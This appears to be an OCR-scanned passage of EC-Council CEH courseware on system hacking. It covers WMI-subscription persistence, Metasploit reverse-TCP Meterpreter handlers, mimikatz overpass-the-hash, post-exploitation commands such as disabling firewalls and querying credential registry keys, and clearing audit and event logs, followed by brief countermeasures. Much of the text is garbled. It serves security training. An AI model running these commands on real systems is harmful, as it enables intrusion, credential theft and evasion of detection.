TsInherited True DirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDa) er PropagationFlags None ctFla ritanceFlags InheritanceType i ontrolType 0 lobjectsiD 5-21-2083413944-2693254119- 1471166842-1104 IPS C:\Users\Administrator\Downloads\PowerView> REG ADD HK t\Services\NTDS\Pa rameters /V AdminSDProtectFrequency /T REG DWORD /F /D 3 REG ADD HKLM\SYSTEM\CurrentControlset es\NTDS\Parameters /V AdminSDProtectFrequency /T REG DWOR ID /F /D The operation completed successfully C:\Users\Administrator\Downloads\Pow jomain Admins" Martin /add /doma Inet group “Domain Admins” Martin /add /dom The command completed succ PS_C:\Users\Administrator\Downloads

Figure 6.196: Screenshot showing the output of adding a user account to a group Run the following command to check the accessibility of the domain which domain persistence is created: dir

controller (DC) through

\\10.10.1.22\c$ indows PowerShell

n>|dir

\\10.10.1

wamp' indow

Figure 6.197: Screenshot showing the accessibility of the DC Module 06 Page 888

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Maintaining Persistence Through WMI Event Subscription @ Attackers use Windows Management Instrumentation (WMI) event subscription to execute malicious content and maintain persistence on the target system

Using Command Prompt and PowerLurk

Using Wmi-Persistence

Copyright © by

Al Rights Reserved. Reproduction is

Maintaining Persistence Through WMI Event Subscription Attackers use Windows Management Instrumentation (WMI) event subscription to execute malicious content and maintain persistence on the target system. They use various scripts and techniques to exploit the features of WMI and perform event subscriptions for malicious events that, when triggered, initiate the execution of arbitrary code allowing attackers to maintain persistence. These scripts automate the process by hiding malicious payloads and maintaining sustainability even after rebooting/restarting the system. Techniques to Maintain Persistence Using WMI Event Subscription

=

Using Command Prompt The following wmic commands create a malicious namespace and subscription for the

events: o

wmic

/NAMESPACE:"\\root\subscription"

PATH

_ EventFilter

CREATE Name="EthicalHacker", EventNameSpace="root\cimv2",QueryLanguage="WQL",

Query="SELECT

* FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS System'" ©

wmic

/NAMESPACE:"\\root\subscription"

CommandLineEventConsumer

CREATE

PATH

Name="EthicalHacker",

ExecutablePath="C: \Windows\System32\ethicalhacker.exe" LineTemplate="C: \Windows\System32\thicalhacker.exe" ©

,Command

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"EthicalHacker\"", Consumer="CommandLineEventConsumer

Module 06 Page 889

.Name=\"EthicalHacker\""

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Figure 6.198: Screenshot of Command Prompt executing wmic commands The malicious payload is automatically executed within 60 s after every restart of the system and creates a Meterpreter session with the attacker.

ploits - 1149 auxiliary - 398 post ayloads - 45 encoders - 10 nops asion

loit tip: Use the command to open the currently active module in your editor Imst6 > 6 > use exploit/multi/handler Using

configured

payload

generic/shell_reverse_

tcp

oadp windows/meterpreter/reverse tcp ) > set payl Imsf6 exploit( payload => windows/meterpreter/reverse_tc 0.10.1.13 > set 6 exploit ( host => 10.10.1.13 > set lport 444 Imsf6 exploit( port exploit (

) > run

arted reverse TCP handler on 10.10.1 nding stage (175174 bytes) to 10.10.1.19 Meterpreter sion 1 opened (10.10.1.13:444 Server

-> 10.10.1.19:49789)

at 2022-04-07 08

getuid

username:

SERVER2019\Administrato

Figure 6.199: Screenshot showing the Metasploit Meterpreter session Using Wmi-Persistence

Attackers also use Wmi-Persistence, a PowerShell script, to perform WMI event subscriptions and acquire persistence. It triggers various actions such as Startup, Logon, Interval, and Timed and allows attackers execute various functions such as the installation, review, and removal of the WMI events. Execute the following command to run a malicious payload on the compromised system to maintain persistence: Install-Persistence -Trigger Startup -Payload "c: \windows\system32\ethicalhacker.exe"

Module 06 Page 890

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Terminal

port => 444 Insf6 exploit(

Help ) > set lport 444

‘console - Parrot

Termin:

) > run

Started reverse TCP hand 19.10.1.13:444 Sending stage (175174 bytes) to 10.10.1.19 Meterpreter session 1 opened (10.10.1.13:444 -> 10.10.1.19:49789) at 2022-04-67 08:53:15

-0406

terpreter

> getuid |ERVER2019\ Administrator rpreter > upload /home/attacker/wmi -Persistence-mas ers\\Administr uploading : /home/attacker/Wmi-Persistence-master/README.md Users\ Administ rator\Downloads README .md uploaded home/attacker/Wmi -Persistence DME.md -> C:\Users\Administrator\Downloads README . md uploading Wi -Persistence-master/WMI istence.ps1 -> C:\Users\Administrator Downloads\WMI -Pers uploaded home/at tacker /Wmi-Persistence-master/WMI-Persistence.ps1 -> C:\Users\Administrator Downloads \WMI-Pers. e.psl load powershell meter: Loading extension powershell. . .Success Incterpreter > powershell shell IPs > Import-Module_. /WHI-Persistence.ps1. PS > Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator Downloads \wi exe Event Filter Dcom Launcher successfully written to host Event Consumer Dcom Launcher successfully written to h Filter To Consumer Binding successfully written to

Terminate channel 3? {y/N) Ml

Figure 6.200: Screenshot of PowerShell showing Wmi-Persistence

The above command includes a trigger Startup that executes the specified payload within 5 min after system reboot and establishes a Meterpreter secession with the attacker.

2* Info:

*superusers*H@rdT@

ipse*Gingabeast cl *E lo al ci es kr ac mH F* CT 3b3r*operators*NULL*stux *Hamad*Immortalsfar

asan*MouseTrap* P* *P@Ge2me* Cs et st en we lu Ho *b t* rs oo t3 2r un ll _H nu @g a* Fl aa r* ad de *t Va oi rd *damn_sadb fezfezf*Lo

2169 exploits - 1149 auxiliary - 398 post 592 payloads - 45 encoders - 10 nops Metasploit tip: Use the ‘omnands from a file

command to run

insf6 > use exploit/milti/handler Using configured payload generic/shell_re tcp Insf6 exploi ) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse tcp insf6 exploit( ) > set lhost 10.10.1.13 host => 10.10.1.13 Insf6 exploit( set lport 444 port => 444 jas f6 exploit( > exploit Started reverse TCP handler on 10.10.1.13:444 Sending stage (175174 bytes) to 10.10.1.19 Meterpreter session 1 opened (10.10.1.13:444 -> 19.10.1.19:49709)

at 2022-04-07 09:30:26

-0400

rpreter

Figure 6.201: Screenshot of the Metasploit Meterpreter session Module 06 Page 891

al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Using PowerLurk

Source: https://github.com PowerLurk is a PowerShell toolset for building malicious WMI event subscriptions. The goal of PowerLurk is to make WMI events easier to trigger during a penetration test or red-team engagement. Attackers use PowerLurk to create malicious WMI event subscriptions and execute arbitrary payloads on every Windows logon. This script can trigger the events such as InsertUSB, UserLogon, Timed, Interval, and ProcessStart. Run the following command to import the PowerLurk script to a local instance: Import-Module

.\PowerLurk.ps1

Run the following command to identify all the active WMI event objects: Get-WmiEvent

Run the following command to create a malicious event subscription that executes the malicious payload and creates a Meterpreter session: Register-MaliciousWmiEvent -EventName Logonlog -PermanentCommand "ethicalhacker.exe" -Trigger UserLogon -Username any

Figure 6.202: Screenshot of PowerShell showing Get-WmiEvent

Module 06 Page 892

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Overpass-the-Hash Attack

CE H

|@ The overpass-the-hash (OPtH) attack is an extension of pass-the-ticket and pass-the-hash attacks @ Itisa type of credential theft-and-reuse attack using which attackers perform malicious activities on compromised devices or environments

@ The main goal of an OPtH attack is to acquire Kerberos tickets using the NTLM hash of different user accounts mimikatz

© Attackers also use mimikatz to perform OPtH attacks and obtain AES128, NTLM (RC4), and AES256 keys for a Kerberos ticket, which can be further used to access different authorized resources

eS Copyright © by

Al Rights Reserved Reproduction i

Overpass-the-Hash Attack The overpass-the-hash (OPtH) attack is an extension of pass-the-ticket and pass-the-hash attacks. It is a type of credential theft-and-reuse attack using which attackers perform malicious activities on compromised devices or environments. The main goal of an OPtH attack is to acquire Kerberos tickets by using the NTLM hash of different user accounts. Attackers initially exploit the security limitation within the NTLM protocol to obtain password hashes or AES from the LSASS memory on the domain controller (DC) or a compromised system. The password hashes are reused by the attackers (until the user changes the password) for gaining access to other network resources. As this is a post-exploitation process, the attackers must have already obtained valid NTLM hashes or AES keys of the target user to request a Kerberos TGT for that specific account. Eventually, attackers gain access to different devices or services that are permissible through the account, and they can manipulate them accordingly.

Module 06 Page 893

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Attackers use tools such as mimikatz to perform OPtH attacks.

=

mimikatz

Source: https://github.com The mimikatz tool credentials such as performing privilege Given below are the (RC4), and AES256 different authorized privilege: sekurlsa:

allows attackers to obtain and store different authentication Kerberos tickets. It assists attackers in stealing credentials and escalation. Attackers also use mimikatz to perform OPtH attacks. commands used to perform the attack and obtain AES128, NTLM keys for a Kerberos ticket, which can be further used to access resources.

:debug :ekeys

Figure 6.203: Screenshot of mimikatz

Module 06 Page 894

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Linux Post-Exploitation File-System Commands

Information-Gathering Commands

Command

Des«

Displays the current process along with its process ID (PID) Attaches a file system to the directory tree structure

Displays host/networknames in numericform

Discovers .txt files on the system

Is 2> /dev/null

a

Displays the list of permitted and forbidden commands

cat /etc/crontab

Displays running cron jobs

Linux Post-Exploitation After compromising and gaining shell access to a target system, attackers attempt to perform further exploitation to gain complete access over other resources and achieve long-term persistence. Listed below are some Linux-based post-exploitation commands.

File-System Commands Command find

/

-perm

-3000

find

/

-path

/sys

/proc

1s

2>

/proc

1s

-o

/dev/null

chmod

find

-prune

o-w

/

2>

-prune

sudo

-1

2>

/dev/null

-prune

-type

-o

-path

f -perm

-o=w

Discovers SUID-executable binaries

-

-name

Discovers world-writable files Disables write access to a file

/sys

-o

/dev/null /

-ls

file

-path

find

Description

-prune

-type

"*.txt"

-o

-path

d -perm

-ls

2>

-o=w

-

/dev/null

Discovers world-writable directories Discovers .txt files on the system Displays the list of permitted and

forbidden commands

openssl s_client -connect : -showcerts

Displays all certificates’ details

keytool -list keystore.jks

Displays contents of keystore files and alias names

-v

-keystore

Table 6.13: Commands on file systems

Module 06 Page 895

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures ‘System Hacking

Exam 312-50 Certified Ethical Hacker

Information-Gathering Commands Command ps

Description

-ef

Displays the current process along with its process ID (PID)

mount

Attaches a file system to the directory tree structure

route

-n

/sbin/ifconfig cat 1s

Displays host/network names in numeric form

-a

/etc/crontab -la

cat

/etc/cron.d

/etc/exports

Displays network configuration details Displays running cron jobs

Displays the software package used for the specified cron job Displays directories that can be exported to NFS clients

cat /etc/redhat* /etc/debian* /etc/*release

Displays the OS version details

1s

Lists bootup services

/etc/re*

egrep

-e

'/bin/ (ba) ?sh' /etc/passwd

Displays all the users who have shell access

cat

Displays SSH relationships and login details

~/.ssh/

Table 6.14: Commands for gathering information

Module 06 Page 896

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

Windows Post-Exploitation

|

File-System Commands

WMIC Commands

Sees nr seaeyaerwmuse

Reboots Windows

findstr/E".Jog">log-xt

(eur

Retrieves the processor's details

CEU LAR eet asa

Retrieves all the document files

na

aid

Retrieves login names and their SIDs

Service Commands commend

Remote Execution Commands

[bescistion

Sequeryex typenservice tec ‘sc queryex type=service

|

Listsall the available services

a

[CEES show sate netsh firewall netsh firewall show config netsh advfirewall set currentprofile state off SSS eaRaR

commend

wii [nodes /Juseradministrator /password:SPASSWORD bios get serialnumber

7

taskkiLexe /S 70

/stops a network service Starts aaa

Displays firewall settings ‘Turns off the firewall service for the current profile Tons of the frewall service forall profiles

omaln\uername [F/I "esat* sername taskstexe

/U

capa aieee % so /S iP eciese> /U lied ee NOME AUTHORITY\SYSTEM run

|

bescription

rieves the PC's serial |Snhaanunaleeali

|

cos

Terminates services associated

wath eswats wise nes the ser con

lomcute commends Retrieves all the processes cunning on these system a that are not actually “SYSTEM’

Windows Post-Exploitation Once attackers compromise a system and gain shell access to it, they can perform various undesirable activities without the user’s knowledge. The main intention behind performing post-exploitation is to gain control over every part of the system and maintain persistence over time. Listed below are some Windows-based post-exploitation commands.

File-System Commands Command dir

Description

/a:h

Retrieves the directory names with hidden attributes

findstr

/E

".txt"

>

txt.txt | Retrieves all the text files

findstr

/E

".log"

>

log.txt | Retrieves all the log files

findstr

/E

".doc"

> doc.txt | Retrieves all the document files Table 6.15: File-system commands

Hash Computing Commands

Command

Description

Get-FileHash

-a

md5

Get-FileHash

-a

shal

Get-FileHash

Generates MD5 hashes | Generates SHA-1 hashes Retrieves SHA-256 hashes by default

Table 6.16: Hash computing commands

Module 06 Page 897

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Registry Commands Command reg query HKLM /f credential /t REG SZ

hk1m_password.

txt

Description /s

>

Detects the registry hives for the value “credential”

reg query

HKLM\SOFTWARE\Policies\Micr

osoft\Windows\Installer

AlwaysInstallElevated reg_always.txt

reg query

HKEY

LOCAL

>

/v

MACHINE\Software

\Microsoft\Windows\Currentv | ersion\Uninstall >> ListofInstalledPrograms. txt

Installs a package with elevated privileges

Provides a list of all programs to query a registry

Table 6.17: Registry commands

Scheduler Commands Command schtasks

/query

tasklist

/Svc

>

/fo

schtasks. txt

tasklist.txt

Description LIST

/v

>

Retrieves the scheduled task list Retrieves all currently active processes

Table 6.18: Task schedule commands

WMIC Commands Command wmic os Primary='TRUE'

Description

reboot

where

wmic service get name ,displayname,pathname,s tartmode > wmic_service.txt wmic

/node:""

:

product

name ,version, vendor

wmic

cpu

get

wmic useraccount : name,sid

get

Reboots Windows Retrieves the service name, path of the executable,

etc.

Displays the details of the installed software Retrieves the processor’s details

get

Retrieves login names and their SIDs Table 6.19: WMIC commands

Module 06 Page 898

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Net Commands Command net

config

rdr

net computer /add net

view

net

view

net

share

Description Shows domain connection details

\\computername

Adds a computer to the domain Displays the list of computers and networks devices in

the domain \\host

Displays the name of the host computer Helps manage shared resources with the appropriate parameters

Table 6.20: Net commands

Network Commands Command route

print

or

Description

netstat

-r

Displays routing tables for the destination

command

arp

-a

Shows the ARP table for a specific IP address

ipconfig

/all

Displays IP configuration details

getmac

Retrieves the physical address Table 6.21: Network commands

Service Commands Command

Description

sc

queryex

type=service

sc

queryex

type=service

state=all

state=all | find /i "Name the service: myService" net

start

or

Lists all the available services

of

Lists details about the specified service

Starts/stops a network service

stop

netsh

firewall

show

state

Displays the current firewall state

netsh

firewall

show

config

Displays firewall settings

netsh advfirewall set currentprofile state off

Turns off the firewall service for the current profile

netsh advfirewall allprofiles state

Turns off the firewall service for all profiles

set off

Table 6.22: Service commands

Module 06 Page 899

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures ‘System Hacking

Exam 312-50 Certified Ethical Hacker

Remote Execution Commands

Command

Description

wmic /node: /user:administrator /password:$PASSWORD bios serialnumber

Retrieves the PC’s serial number

get

taskkill.exe /S domain\username

/F /FI "eset"

/U

tasklist.exe /S domain\username

tasklist.exe /S /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"

Terminates services associated with eset Defines the user context to execute commands

Retrieves all the processes running on the system that are not actually “SYSTEM”

Table 6.23: Remote execution commands

Sysinternals Commands Command psexec cmd

Description

-i

\\

psexec -i file.exe

\\

Establishes an interactive CMD with a remote system -c

psexec -i -d -s c:\windows\regedit.exe psexec

ipconfig

-i

Copies

file.txt

computer

from

the

local

machine

to

a

remote

Retrieves the contents of security keys and SAM

\\

Displays a remote system’s network information

/all

Table 6.24: Sysinternals commands

Authenticated WMI Exec via PowerShell Commands

Description

msf > use exploit/windows/local/ps_wmi_exec

Launches a suitable local exploit

msf exploit (windows/local/ps_wmi_exec) show targets

>

msf exploit (windows/local/ps_wmi_exec) show options

>

msf exploit (windows/local/ps_wmi_exec) show payloads

>

msf exploit (windows/local/ps_wmi_exec) show evasion

>

Displays the list of targets Displays all the available options Displays possible payloads Displays suitable evasion options.

Table 6.25: Metasploit commands

Module 06 Page 900

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

How to Defend against Persistence Attacks Discussed attacks:

below

are some

of the

countermeasures

to defend

against

domain

dominance

Frequently change the password of KRBTGT. Use admin credentials only if the data need to be shared among the devices. Give access permissions based on user roles. Perform system patch management periodically. Deploy a minimum privileges access model, which assists in restricting user access and domain admin account access. Monitor Kerberos TGTs and domain replication activities. Regularly change KRBTGT’s password and reset the service twice. Validate the Kerberos protocol externally to ensure that TGTs are not forged. Conduct security awareness campaigns/training on phishing attacks, password creation policies, and other methods. Strictly adhere to password policies (in terms of password length, periodic updates, etc.) to enhance the security of individual account access. Ensure that Kerberos follows the signing of the Privilege Attribute Certificate (PAC) and TGS with the key “krbtgt” by the key distribution center (KDC). Deploy the Kerberos validation provided by a valid KDC.

tool for verifying the legitimacy of individual tickets

Install KB2871997 patch in systems running on Windows 7 and higher for restricting the default account access within the local administrator group. Restrict the credential overlap privileged account management.

within

systems

to

limit

lateral

movement

through

Impose the UAC limitations across local accounts over network logon by enabling passthe-hash mitigations. The registry key to apply UAC restrictions is HKLM\ SOFTWARE \Microsoft\Windows\CurrentVersion\Policies\System\Lo calAccountTokenFilterPolicy

Restrict domain users within a local administrator group across multiple systems. Limit the inbound traffic through Windows Firewall.

Module 06 Page 901

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#04: Demonstrate Techniques to Hide the Evidence of Compromise

Clearing Logs In the previous section, we saw how an attacker can hide malicious files on a target computer using various steganographic techniques, NTFS streams, and other techniques to maintain future access to the target. Once the attacker has succeeded in performing this malicious operation, the next step involves removing any resultant traces/tracks in the system.

Module 06 Page 902

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Covering Tracks ‘@

Once intruders have successfully

gained administrator access ona

system, they will try to cover their

tracks to avoid detection

C iE H

=

|_|

& JB Nap even eeeeeeeeeeeeeen: >

Gained

Administrator

Target User

‘Access

Cover Tracks

The attacker uses the following techniques to cover his/her tracks on the target system

e

Disable Auditing

© cosine ce (3)

Manipulating Logs

e

Covering Tracks on the Network/OS

| | © oxeeaseae stes (6)

Disabling Windows Functionality Copyright © by

Covering Tracks Covering tracks is one of the main stages during system hacking. In this stage, the attacker tries to hide and avoid being detected or “traced out” by covering all “tracks,” or logs, generated while accessing the target network or computer. We now look at how the attacker removes traces of an attack on a target computer. Erasing evidence is a must for any attacker who would like to remain obscure. used to evade a traceback. It starts with erasing the contaminated logs and messages generated in the attack process. The attacker makes changes configuration such that it does not log the future activities. By manipulating and logs, the attacker tricks the system administrator into believing that there activity in the system and that no intrusion or compromise has taken place.

It is a method possible error to the system tweaking event is no malicious

Because the first thing a system administrator does when monitoring unusual activity is check the system log files, it is common for intruders to use a tool to modify these logs. In some cases, rootkits can disable and discard all existing logs. Attackers remove only those portions of logs that can reveal their presence if they intend to use the system for a long period as a launch base for future exploitations. Attackers must make the system appear as it did before access was gained and a backdoor was established. This allows them to change any file attributes back to their original state. The information listed, such as file size and date, is just attribute information contained in the file. Protection against attackers trying to cover their tracks by changing file information can be difficult. However, it is possible to detect whether an attacker has done so by calculating the file’s cryptographic hash. This type of hash is a calculation of the entire file before encryption.

Module 06 Page 903

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Attackers may not wish to delete an entire log to cover their tracks, as doing so may require admin privileges. If attackers can delete only attack event logs, they will still be able to escape detection. The attacker can manipulate the log files with the help of =

SECEVENT.EVT (security): failed logins, accessing files without privileges

=

SYSEVENT.EVT (system): driver failure, things not operating correctly

=

APPEVENT.EVT (applications)

Techniques Used for Covering Tracks The main activities that an attacker performs toward removing his/her traces on a computer are as follows: =

Disabling Auditing: An attacker disables auditing features of the target system.

=

Clearing Logs: An his/her activities.

=

Manipulating Logs: An attacker manipulates logs in such a way that he/she will not be caught in legal action.

=

Covering Tracks on the Network: An attacker uses techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunneling, and TCP parameters to cover tracks on the network.

=

Covering Tracks on the OS: An attacker uses NTFS streams to hide and cover malicious files in the target system.

=

Deleting Files: An attacker uses a command-line tool such as Cipher.exe to delete the data and prevent recovery of that data in future.

=

Disabling Windows Functionality: An attacker disables Windows functionality such as last access timestamp, hibernation, virtual memory, system restore points, etc. to cover tracks.

=

Hiding Artifacts: Attackers hide their malicious artifacts within the OS artifacts to evade detection.

attacker

clears/deletes

the

system

log entries

corresponding

to

Thus, the complete job of an attacker involves not only compromising the system successfully, but also disabling logging, clearing log files, eliminating evidence, planting additional tools, and covering his/her tracks.

Module 06 Page 904

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Disabling Auditing: Auditpol

[=o] a

@

Intruders disable auditing

immediatly after gaining administrator privileges

@

Toward the end of their stay, the

intruders simply turn on auditing again using auditpol.exe

‘tes /8ocs microsoft.com

Disabling Auditing: Auditpol Source: https://docs.microsoft.com One of the first steps for an attacker who has command-line capability is to determine the auditing status of the target system, locate sensitive files (such as password files), and implant automatic information-gathering tools (such as a keystroke logger or network sniffer). Windows records certain events to the event log (or associated syslog). The log can be set to send alerts (email, SMS, etc.) to the system administrator. Therefore, the attacker will want to know the auditing status of the system he/she is trying to compromise before proceeding with his/her plans. Auditpol.exe is the command-line utility tool to change audit security settings at the category and sub-category levels. Attackers can use AuditPol to enable or disable security auditing on local or remote systems, and to adjust the audit criteria for different categories of security

events.

The moment intruders gain administrative privileges; they disable auditing with the help of auditpol.exe. Once they complete their mission, they again turn on auditing using the same tool. After gaining access and establishing shell access with the target system, following commands to enable/disable system auditing logs:

attackers use the

Enabling system auditing: C:\>auditpol

/set

/failure:enable

Module 06 Page 905

/category:”system”,”account

logon”

/success:enable

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Disabling system auditing: C:\>auditpol

/set

/failure:disable

/category:”system”,”account

logon”

/success:disable

This will make changes in the various logs that might register the attacker’s actions. He/she can choose to hide the registry keys changed later on. Attackers can use AuditPol to view defined auditing settings on the target computer, the following command at the command prompt: auditpol

/get

running

/category:*

Screenshots of the output by Auditpol are as follows: BH Administrator: Command Prompt

unt

ao

x

logon”

|

Figure 6.204: Screenshot showing the output of Auditpol disabling audit BIH Administrator: Command Prompt 2>auditpol

t

r

o

x e

|

full

Figure 6.205: Screenshot showing the output of Auditpol enabling audit Module 06 Page 906

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Clearing Logs

CEH

@ The attacker uses the clear lear ththe security, ity, system, system, and and application application | logs

utility to

W Ifthe system is exploited with Metasploit,the attacker uses to wipe out all the logs froma Windows system

Tilas Jnr fenforumacom

Clearing Logs (Cont’d) The attacker uses the commandto clear all the PowerShell event logs from local or remote computers

CEH The attacker uses the utility to clear event logs relatedto the system, application, and security

© Toclear the entries from the PowerShell event from a local or remote system: © To clear specific multiple log types from the local and remote systems:

© Toclear all logs on the specified systems and then display the event log list:

Clearing Logs Clear_Event_Viewer_Logs.bat is a utility that can be used to wipe out the logs of the target system. This utility can be run through command prompt, PowerShell, and using a BAT file to delete security, system, and application logs. Attackers might use this utility to wipe out the logs as one method of covering their tracks on the target system.

Module 06 Page 907

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Steps to clear logs using Clear_Event_Viewer_Logs.bat utility are as follows.

Pw nN

Download the Clear_Event_Viewer_Logs.bat utility from https://www.tenforums.com. Unblock the .bat file.

no

1.

A command prompt will now open to clear the event logs. The command will automatically close when finished.

BB CAWindows\

Right-click or press and hold on the .bat file and click/tap on Run as administrator. If prompted by UAC, click/tap on Yes.

System32\cmd.exe

prompt

o

x

Figure 6.206: Screenshot of clearing logs using the Clear_Event_Viewer_Logs.bat file =

Steps to clear logs using Meterpreter shell are as follows. If the system is exploited with Metasploit, the attacker uses a Meterpreter shell to wipe out all the logs from a Windows system: 1.

Launch the meterpretershell prompt from the Metasploit Framework.

2.

Type clearev command in the Meterpreter shell prompt and press Enter. The logs of the target system will start being wiped out.

Module 06 Page 908

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

NT AUTHORITY\SYSTEM > run post/windows/gather/smart_hashdump SION may not be compatible with this module et_term size sys_proces ing Meterpreter features Running module against WINDOWS11 ill be saved to the database if one is connected oot in JtR p rd file format to 040218 default_10.10.1.11 windows hashes

Dumping ¢ Running as S ting hashes from registry Obtaining the boot key

EY bf7ee388b30e6e9f6b86de4c

culating the hboot key using ing the user list and k

user

word

295636.

txt

18416716

keys

hint

ord hints

on this

system

5.1404eeaad3b435b51404ee : 31d6cfedd16ae931b 51404ee : 31d6cfedd16ae931b73c59d7e0ce 1404eeaad az DefaultAccount : 503: WDAGUti LityAccount :504:aad3 51484eeaad3b435b51404ee: 31d6cfedd16ae931b73c59d Admin: 1002: aad3b435b51404 5b5140dee: 31d6cfe0d16ae931b73c59d7e0c089c0 Jason: 1005 : aad3b435b51404eeaad3b435b51404ee : 31d6cfedd16ae931b7: e0cO89c0 Shiela: 1006: aad3b435b51404eeaad3b435b51404ee : 31d6cfedd16ae931! 9d7e0c08 10 7: aad3b435b51404eeaad3b435b51404ee : 31d6cfeOd16a 9d7e6c from Application from Syste

Figure 6.207: Screenshot of Meterpreter

Steps to clear PowerShell logs using Clear-EventLog command are as follows.

Source: https://docs.microsoft.com Using the Clear-EventLog command, the attacker can clear all the PowerShell event logs from local or remote computers: 1.

Launch Windows PowerShell with administrator privileges.

2.

Use the following command the local or remote system: >Clear-EventLog

to clear the entries from the PowerShell event log on

"Windows

PowerShell"

Use the following command to clear specific multiple log types from local or remote

systems:

>Clear-EventLog localhost,

-LogName

ODiag,

OSession

-ComputerName

Server02

(This command clears all the log entries in Microsoft Office Diagnostics (ODiag) and Microsoft Office Sessions (OSession) on the local computer and Server02 remote computer.) Use the following command to clear all the logs on the specified systems, and then display the event log list: >Clear-EventLog Module 06 Page 909

-LogName

application,

system

-confirm

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Note: The parameters used in the Clear-EventLog

=

command are as follows:

©

-ComputerName: Specifies

a remote computer; the default is the local computer

©

-Confirm: Prompts you for confirmation before running cmdlet

©

-LogName: Specifies the event logs

©

-WhatIf: Shows what will happen if the cmdlet runs

Steps to clear event logs using wevtutil utility are as follows. 1.

Launch command

2.

Use the following command to display a list of event logs: >wevtutil

3.

prompt with administrator privileges.

el

Use the following command to clear the event logs: >wevtutil

cl

log_name: name of the log to clear, ex: system, application, security. As shown in the screenshot, the attacker can view the list of event logs using the wevtutil utility and clear the system, application, and security event logs.

°° 0 555

Select Administrator: Command Prompt

>rmance

m>

pmance

DevicePro MediaEngi Performance

Figure 6.208: Screenshot of clearing logs using the wevtutil utility Module 06 Page 910

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Manually Clearing Event Logs For Windows

For Linux

© Navigateto Start > Control Panel > System and Security > Windows Tools > double click Event Viewer © Delete the all the log entries logged while compromisingthe system

Diiomaon sean 2ts9R nd eae 1Bhppa Scone

Gymmariatont

Geomsnstaont sim iat

Sent

||

Seance feneso ents

© Navigateto /var/log directoryon the Linux system © Open the plain text file containing log messages with text editor /vax/1og//

© Delete all the log entries logged while compromisingthe system

Ops. "

Manually Clearing Event Logs Once attackers gain administrative access to a target system, they can manually wipe out the log entries corresponding to their activities on both Windows and Linux computers. The steps to clear event logs on Windows and Linux OSs are as follows:

